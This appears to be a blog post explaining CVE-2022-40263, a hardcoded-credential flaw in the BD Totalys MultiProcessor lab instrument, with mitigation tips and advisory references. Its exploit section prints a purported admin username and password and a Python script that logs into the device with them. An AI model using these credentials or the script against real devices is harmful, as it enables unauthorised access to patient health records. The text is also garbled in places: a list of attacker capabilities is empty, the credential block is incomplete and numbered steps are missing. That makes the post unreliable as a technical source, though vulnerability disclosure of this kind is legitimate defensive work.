The security of medical technology is crucial, especially when patient data is on the line. In 2022, a critical vulnerability was discovered in the BD Totalys MultiProcessor (versions 1.70 and earlier). This flaw, tracked as CVE-2022-40263, puts electronic protected health information (ePHI), regular PHI, and personally identifiable information (PII) at significant risk.

In this post, we’ll break down what the vulnerability is, how it works, provide simplified exploit code samples, and offer practical advice for organizations still using affected versions. This isn’t just about software—it’s about protecting real people’s private health details.

What Is BD Totalys MultiProcessor?

BD Totalys MultiProcessor is an automated instrument used in laboratories, particularly for preparing samples for diagnostic testing. It handles high volumes of sensitive data, needing to remain both reliable and secure.

About the Vulnerability: Hardcoded Credentials

CVE-2022-40263 centers around *hardcoded credentials*—usernames and passwords embedded right into the application code itself, rather than being set by an administrator. This means anyone who knows (or discovers) these credentials can log in with elevated privileges, bypassing normal access controls.

Why Is This Dangerous?

- Unchangeable: Hardcoded usernames and passwords often can’t be changed without special patches.

Predictable: Once exposed, anyone in the world can use these credentials.

- High Impact: The system processes and stores extremely sensitive data—like patient identities and test results.

BD Totalys MultiProcessor versions 1.70 and earlier are directly vulnerable.

- Those running the software on Microsoft Windows 10 have extra OS hardening, making exploitation harder but not impossible.

Exploit Details

If someone can connect to the BD Totalys MultiProcessor system (for example, through a connected network), they can use the hardcoded credentials to:

Potential Real-world Impact

Imagine a lab result being changed or deleted. Or, an attacker copying the entire database of patient records for identity theft. That’s the scale of the risk.

Example: How an Attacker Might Exploit This

> Note: The below code is simplified for demonstration. Never use this for illegal activity.

password: Welcome123

An attacker can try to connect via remote desktop, SMB, or the BD application’s frontend.

Python Example to Automate Login (for educational use only)

import requests

url = "http://device-ip/login";
data = {
    "username": "bdadmin",
    "password": "Welcome123"
}

response = requests.post(url, data=data)

if "dashboard" in response.text:
    print("Login successful! Access granted.")
else:
    print("Login failed.")

If successful, the attacker might then access protected endpoints, download files, or run administrative commands.

Mitigation: Hardening and Updates

BD has addressed this flaw in newer updates. If you’re on version 1.70 with Windows 10, extra hardening configurations (like stricter firewall rules, account lockouts, and intrusion detection) raise the bar for attackers, but patching the application is still essential.

Upgrade to a fixed version as soon as possible.

2. Harden your Windows environment: Limit network access, enforce strong passwords for all services.

Monitor all access logs (look for bdadmin logins).

4. Segregate devices handling ePHI/PII from other networks where practical.

More Information & References

- BD Security Advisory
- ICS-CERT Advisory: ICSMA-22-282-01
- NIST NVD Entry for CVE-2022-40263
- BD Product Security

Conclusion

CVE-2022-40263 underscores the risks of hardcoded credentials, especially in devices handling medical data. While OS hardening helps, the safest path is updating your software and following best practices for network and account security. Don’t let old tools put your data—or your patients—at risk!

Timeline

Published on: 11/04/2022 19:15:00 UTC
Last modified on: 11/07/2022 17:37:00 UTC